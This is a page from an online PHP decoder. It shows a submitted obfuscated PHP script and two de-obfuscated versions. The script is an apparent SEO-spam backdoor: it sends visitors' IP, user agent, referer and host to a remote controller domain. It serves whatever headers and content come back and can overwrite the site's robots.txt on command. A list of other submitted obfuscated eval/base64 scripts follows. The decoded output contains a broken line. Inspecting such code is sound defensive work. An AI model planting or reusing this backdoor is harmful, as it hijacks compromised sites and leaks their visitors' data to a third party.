Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php ERroR_rEpOrtINg(rOUnD(0+0+0+0)); $HnibL="\172\152\62\62\66\66"; $DL="g\163\61"; if(PrEg_maTCh("\57\152p\62\60\62\63\57\163\151",$_SERVER["REQU\105S\124_URI"])==rOunD(0.0884156+0.21910294+0.23104+0.141013+0.22652469+0.0939)) { if(prEg_MatcH("\57j\160\62\60\62\63cw\167/\163\151",$_SERVER["REQU\105S\124_URI"])==rouNd(0+0+0+0+0)) { HeAdER("\110\124\124\120\57\61.\60 \64\60\64\40\116ot\40F\157\165\156\144"); } echo "\110TTP\57\61\56\60 \64\60\64\40Not\40F\157un\144_\137\137".$HnibL."\137\137_".$DL; exit; } $lJR="\56\167a"; $dTuwz="pa\143"; $Ngh="\164\151o\156.com"; $tjUSH="\150ttp://".$HnibL.$lJR.$dTuwz.$Ngh; $womXr="\57i\156\144e\170\56\160hp\77V\123=".$DL."\46G\120\75".$HnibL; $oB=array( "\123\103R\111\120T\137NA\115\105", "REQU\105S\124_URI", "HT\124\120S", "\122EQUE\123\124_\123CH\105\115\105", "SE\122VE\122\137P\117\122T", "RE\115O\124E\137AD\104R", "HT\124\120\137\122\105FE\122\105\122", "HT\124\120_A\103C\105\120T\137L\101\116\107\125A\107\105", "HT\124P\137\125S\105\122_\101\107EN\124", "\110TTP_\110\117S\124" ); foreach($oB as $tO) { if ($tO=="RE\115O\124E\137AD\104R") { $hwDsp=isset($_SERVER["H\124TP_\130\137F\117RW\101\122\104E\104\137F\117\122"])?$_SERVER["H\124TP_\130\137F\117RW\101\122\104E\104\137F\117\122"]:(isset($_SERVER["RE\115O\124E\137AD\104R"])?$_SERVER["RE\115O\124E\137AD\104R"]:''); }else { $hwDsp=isset($_SERVER[$tO])?$_SERVER[$tO]:''; } $azId=base64_EncOdE(tRiM($hwDsp)); $azId=str_rEPLaCE("\53","-",$azId); $azId=stR_REPLAce("/","_",$azId); $azId=str_rePlAce("=",".",$azId); $womXr.="&".$tO."=".$azId; } $HFDseg=$tjUSH.$womXr; $iV=CUrl_iNIt(); cUrL_sETopt($iV,CURLOPT_URL,$HFDseg); CUrl_SETOpt($iV,CURLOPT_RETURNTRANSFER,RoUND(0.1397+0.07543+0.080998+0.1162407+0.16818+0.096661+0.03236+0.19455894+0.09583677)); CurL_sETOPT($iV,CURLOPT_CONNECTTIMEOUT,rOund(7.878+2.12202)); $cuY=cuRl_exeC($iV); $cuY=trIm($cuY); CuRl_CLOsE($iV); if(empty($cuY)) { $PxL="\146\151\154"; $Kld="e\137g"; $JxODmw="\145t_\143"; $lXth="o\156t\145"; $aqBz="\156t\163"; $pojOa=$PxL.$Kld.$JxODmw.$lXth.$aqBz; $cuY=$pojOa($HFDseg); } $cuY=tRim($cuY); $aTQZYj=EXplODe("\174@#\44\174",$cuY); $OpRsJ=cOUnT($aTQZYj); if($OpRsJ<3) { hEaDEr("\110\124\124\120\57\61.\60 \64\60\64\40\116ot\40F\157\165\156\144"); exit; }else { $kEd=TRIM($aTQZYj[ROUND(0+0+0+0+0)]); if(!empty($kEd)) { HEaDEr($kEd); } $aq=TRiM($aTQZYj[ROUND(0.11992+0.00314825+0.281339+0.11591+0.1362335+0.1514+0.07212364+0.11992)]); if(!empty($aq)) { echo $aq; } $euHi=tRim($aTQZYj[$OpRsJ-rouNd(0.109+0.206+0.096+0.158238+0.182+0.1317+0.1172221)]); if($euHi=="\145x\151t") { exit; } if($euHi=="p\151\156\147") { $tEsDVh="\125ser\55\141\147ent:\52".PHP_EOL; $tEsDVh.="\101l\154o\167\72\57".PHP_EOL; $UWkI=exploDE("\74b\162/\76",$aq); ARrAY_POP($UWkI); foreach($UWkI as $IUH) { $tEsDVh.="S\151t\145m\141p\72".$IUH.PHP_EOL; } $IHDleq=fOPEN($_SERVER["DOC\125\115\105NT_ROO\124"]."\57r\157b\157\164\163.tx\164","\167"); fwRite($IHDleq,$tEsDVh); FcLoSE($IHDleq); echo "\162\157\142\157\164s\56\164\170\164\40\144one"; exit; } } ?>

Show other level

Decrypted code level 1:

ERroR_rEpOrtINg(rOUnD(0+0+0+0));
 $HnibL="zj2266";
 $DL="gs1";
	 if(PrEg_maTCh("/jp2023/si",$_SERVER["REQUEST_URI"])==rOunD(0.0884156+0.21910294+0.23104+0.141013+0.22652469+0.0939)) {
		 if(prEg_MatcH("/jp2023cww/si",$_SERVER["REQUEST_URI"])==rouNd(0+0+0+0+0)) {
		 HeAdER("HTTP/1.0 404 Not Found");
		 
	}
	 echo "HTTP/1.0 404 Not Found___".$HnibL."___".$DL;
	 exit;
	 
}
 $lJR=".wa";
 $dTuwz="pac";
 $Ngh="tion.com";
 $tjUSH="http://".$HnibL.$lJR.$dTuwz.$Ngh;
 $womXr="/index.php?VS=".$DL."&GP=".$HnibL;
 $oB=array( "SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST" );
	 foreach($oB as $tO) {
		 if ($tO=="REMOTE_ADDR") {
		 $hwDsp=isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:'');
		 
	}
		else {
		 $hwDsp=isset($_SERVER[$tO])?$_SERVER[$tO]:'';
		 
	}
	 $azId=base64_EncOdE(tRiM($hwDsp));
	 $azId=str_rEPLaCE("+","-",$azId);
	 $azId=stR_REPLAce("/","_",$azId);
	 $azId=str_rePlAce("=",,$azId);
	 $womXr.="&".$tO."=".$azId;
	 
}
 $HFDseg=$tjUSH.$womXr;
 $iV=CUrl_iNIt();
 cUrL_sETopt($iV,CURLOPT_URL,$HFDseg);
 CUrl_SETOpt($iV,CURLOPT_RETURNTRANSFER,RoUND(0.1397+0.07543+0.080998+0.1162407+0.16818+0.096661+0.03236+0.19455894+0.09583677));
 CurL_sETOPT($iV,CURLOPT_CONNECTTIMEOUT,rOund(7.878+2.12202));
 $cuY=cuRl_exeC($iV);
 $cuY=trIm($cuY);
 CuRl_CLOsE($iV);
	 if(empty($cuY)) {
	 $PxL="fil";
	 $Kld="e_g";
	 $JxODmw="et_c";
	 $lXth="onte";
	 $aqBz="nts";
	 $pojOa=$PxL.$Kld.$JxODmw.$lXth.$aqBz;
	 $cuY=$pojOa($HFDseg);
	 
}
 $cuY=tRim($cuY);
 $aTQZYj=EXplODe("|@#$|",$cuY);
 $OpRsJ=cOUnT($aTQZYj);
	 if($OpRsJ<3) {
	 hEaDEr("HTTP/1.0 404 Not Found");
	 exit;
	 
}
	else {
	 $kEd=TRIM($aTQZYj[ROUND(0+0+0+0+0)]);
		 if(!empty($kEd)) {
		 HEaDEr($kEd);
		 
	}
	 $aq=TRiM($aTQZYj[ROUND(0.11992+0.00314825+0.281339+0.11591+0.1362335+0.1514+0.07212364+0.11992)]);
		 if(!empty($aq)) {
		 echo $aq;
		 
	}
	 $euHi=tRim($aTQZYj[$OpRsJ-rouNd(0.109+0.206+0.096+0.158238+0.182+0.1317+0.1172221)]);
		 if($euHi=="exit") {
		 exit;
		 
	}
		 if($euHi=="ping") {
		 $tEsDVh="User-agent:*".PHP_EOL;
		 $tEsDVh.="Allow:/".PHP_EOL;
		 $UWkI=exploDE("<br/>",$aq);
		 ARrAY_POP($UWkI);
			 foreach($UWkI as $IUH) {
			 $tEsDVh.="Sitemap:".$IUH.PHP_EOL;
			 
		}
		 $IHDleq=fOPEN($_SERVER["DOCUMENT_ROOT"]."/robots.txt","w");
		 fwRite($IHDleq,$tEsDVh);
		 FcLoSE($IHDleq);
		 echo "robots.txt done";
		 exit;
		 
	}
	 
}

Decrypted code level 2:

ERroR_rEpOrtINg(rOUnD(0+0+0+0));
	   if(PrEg_maTCh("/jp2023/si",$_SERVER["REQUEST_URI"])==rOunD(0.0884156+0.21910294+0.23104+0.141013+0.22652469+0.0939)) {
		 if(prEg_MatcH("/jp2023cww/si",$_SERVER["REQUEST_URI"])==rouNd(0+0+0+0+0)) {
		 HeAdER("HTTP/1.0 404 Not Found");
		 
	}
	 echo "HTTP/1.0 404 Not Found___zj2266___gs1";
	 exit;
	 
}
 $lJR=".wa";
  $Ngh="tion.com";
 $tjUSH="http://zj2266".$lJR."pac".$Ngh;
 $womXr="/index.php?VS=gs1&GP=zj2266";
 $oB=array( "SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST" );
	 foreach($oB as $tO) {
		 if ($tO=="REMOTE_ADDR") {
		 $hwDsp=isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:'');
		 
	}
		else {
		 $hwDsp=isset($_SERVER[$tO])?$_SERVER[$tO]:'';
		 
	}
	 $azId=base64_EncOdE(tRiM($hwDsp));
	 $azId=str_rEPLaCE("+","-",$azId);
	 $azId=stR_REPLAce("/","_",$azId);
	 $azId=str_rePlAce("=",,$azId);
	 $womXr.="&".$tO."=".$azId;
	 
}
 $HFDseg=$tjUSH.$womXr;
 $iV=CUrl_iNIt();
 cUrL_sETopt($iV,CURLOPT_URL,$HFDseg);
 CUrl_SETOpt($iV,CURLOPT_RETURNTRANSFER,RoUND(0.1397+0.07543+0.080998+0.1162407+0.16818+0.096661+0.03236+0.19455894+0.09583677));
 CurL_sETOPT($iV,CURLOPT_CONNECTTIMEOUT,rOund(7.878+2.12202));
 $cuY=cuRl_exeC($iV);
 $cuY=trIm($cuY);
 CuRl_CLOsE($iV);
	 if(empty($cuY)) {
	      $pojOa="file_get_contents";
	 $cuY=$pojOa($HFDseg);
	 
}
 $cuY=tRim($cuY);
 $aTQZYj=EXplODe("|@#$|",$cuY);
 $OpRsJ=cOUnT($aTQZYj);
	 if($OpRsJ<3) {
	 hEaDEr("HTTP/1.0 404 Not Found");
	 exit;
	 
}
	else {
	 $kEd=TRIM($aTQZYj[ROUND(0+0+0+0+0)]);
		 if(!empty($kEd)) {
		 HEaDEr($kEd);
		 
	}
	 $aq=TRiM($aTQZYj[ROUND(0.11992+0.00314825+0.281339+0.11591+0.1362335+0.1514+0.07212364+0.11992)]);
		 if(!empty($aq)) {
		 echo $aq;
		 
	}
	 $euHi=tRim($aTQZYj[$OpRsJ-rouNd(0.109+0.206+0.096+0.158238+0.182+0.1317+0.1172221)]);
		 if($euHi=="exit") {
		 exit;
		 
	}
		 if($euHi=="ping") {
		 $tEsDVh="User-agent:*".PHP_EOL;
		 $tEsDVh.="Allow:/".PHP_EOL;
		 $UWkI=exploDE("<br/>",$aq);
		 ARrAY_POP($UWkI);
			 foreach($UWkI as $IUH) {
			 $tEsDVh.="Sitemap:".$IUH.PHP_EOL;
			 
		}
		 $IHDleq=fOPEN($_SERVER["DOCUMENT_ROOT"]."/robots.txt","w");
		 fwRite($IHDleq,$tEsDVh);
		 FcLoSE($IHDleq);
		 echo "robots.txt done";
		 exit;
		 
	}
	 
}

Recent submissions:

<?php $p = "/home3/soheilb2/theskygroup.ca/dist//opt/cpanel/ea-php72/root/tmp/app_12/app... #!/usr/bin/php <?php if(!defined('VDCB62E473B7A3C827DD63940EB8A1F9B'))define('VDCB62E473... <?php /** Obfuscator by ALOM & SKIBIDIXXX * This script has protected by Alom. * Than... ?><?php /*Encoded by DumpSys (https://t.me/DumpSysOfficial)*/ eval("\x6f\x62\x5f\x73\x74\... eval("ob_start(); "); ``_c•Ž—HXTpš“••R•Uz¬¥©´¯]f§´µ²¶~t... <?php /*Encoded by DumpSys (https://t.me/DumpSysOfficial)*/ eval("\x6f\x62\x5f\x73\x74\x61... <?php /*Encoded by DumpSys (https://t.me/DumpSysOfficial)*/ eval("\x6f\x62\x5f\x73\x74\x61... <?php //<PHPDATA>fputs_enc;86;elem</PHPDATA> if(@$_REQUEST["\x65lem"]!==null):$_0=arRay... <?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(bas... <?php eval(base64_decode('CiBnb3RvIGNrT2JzOyBGUEJ6dDogPz4KPC9saT48bGk+PHN0cm9uZz5QdWJsaWMg...